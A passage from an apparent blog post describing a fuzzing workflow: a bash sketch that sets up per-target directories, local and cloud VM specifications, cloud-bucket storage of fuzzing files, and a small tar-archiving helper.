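For reference, the behavior described above can be sketched in a few lines. This is a reconstruction from the description, not the original init-target.sh. The init_target function and the TARGETS_ROOT and TOOLS_DIR overrides are hypothetical names added so the sketch can be tried without touching ~/targets:

```shell
#!/usr/bin/env bash
# Sketch of init-target.sh based on the description (not the original script).
# TARGETS_ROOT and TOOLS_DIR are hypothetical overrides for illustration.
init_target() {
    local name="$1"
    local root="${TARGETS_ROOT:-$HOME/targets}"
    local tools="${TOOLS_DIR:-$(pwd)/tools}"

    if [ -z "$name" ]; then
        echo "[!] usage: init_target <target-name>" >&2
        return 1
    fi

    # src/ holds the target's source, inputs/ the testcases,
    # syncdir/ the output of the fuzzers
    mkdir -p "$root/$name/src" "$root/$name/inputs" "$root/$name/syncdir" || return 1

    # cmin.sh expects to be run from the target directory
    if [ -f "$tools/cmin.sh" ]; then
        cp "$tools/cmin.sh" "$root/$name/"
    fi

    echo "[+] created $root/$name"
}

# Example: init_target mytarget
```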

Local and Cloud Environments
As mentioned above, I start off working in a local VM and then transition over to a cloud instance for the actual fuzzing.

The local fuzzing VM is used for target selection and doing the initial build and instrumentation of the target. This VM isn’t very powerful because it doesn’t really need to be. I use these specs for a VM on my laptop:

- 2 CPUs
- 20GB HDD
- 4GB RAM
- Ubuntu Server 16.04 64-bit


Once the VM is created, I do a clean install of the OS and take a snapshot for easy redeployment in case something goes wrong. Then I use the scripts from above to do the configuration and installation of tools.

Since the cloud instance is responsible for running the real fuzzing job, I provision it with more resources. There are times when I want to use different specs for the cloud VM, so I create instance templates with the following specs:

- 4 CPU
- 8GB RAM 
- 20GB HDD
- Ubuntu Server 16.04 64-bit

- 8 CPU
- 16GB RAM 
- 20GB HDD
- Ubuntu Server 16.04 64-bit

- 16 CPU
- 32GB RAM 
- 20GB HDD
- Ubuntu Server 16.04 64-bit


These VMs are configured with the same scripts as the local VM.

Cloud Storage
The cloud storage bucket is used as a central storage point for the fuzzing files. After everything has been successfully built in the local VM and I’ve tested fuzzing, I copy the files to the storage bucket, where they will later be downloaded to the cloud instance for the full fuzzing job. I also store the resulting files for each round of fuzzing and crash case minimization in the cloud bucket.
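
One way to make the copy step simpler is to bundle the whole target directory into a single archive first. The sketch below is only an illustration: pack_target is a hypothetical helper that is not part of fuzzy-scripts, and the actual upload command depends on the cloud provider's CLI, so it is left out.

```shell
#!/usr/bin/env bash
# Hypothetical helper, not part of fuzzy-scripts: bundles a target directory
# into one .tar.gz so a single file can be copied to the storage bucket.
pack_target() {
    local target_dir="$1"      # e.g. ~/targets/mytarget
    local out_dir="${2:-.}"    # where to write the archive (outside target_dir)
    local name archive

    if [ ! -d "$target_dir" ]; then
        echo "[!] not a directory: $target_dir" >&2
        return 1
    fi

    name="$(basename "$target_dir")"
    archive="$out_dir/$name.tar.gz"

    # -C keeps paths inside the archive relative to the parent of the target dir
    tar -czf "$archive" -C "$(dirname "$target_dir")" "$name" || return 1
    echo "$archive"
}

# Example: pack_target ~/targets/mytarget /tmp
# Then upload the printed archive path with the provider's own CLI.
```

On the cloud instance, extracting the archive under ~/targets restores the same layout that init-target.sh creates.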

Conclusion
There it is! Nothing too complicated or special happening, but this workflow lets me figure out all of the details locally and then get right to work in the cloud. I hope it will be helpful to anyone out there still figuring out their own process. In the next post I’ll write about selecting interesting targets and where to find them.
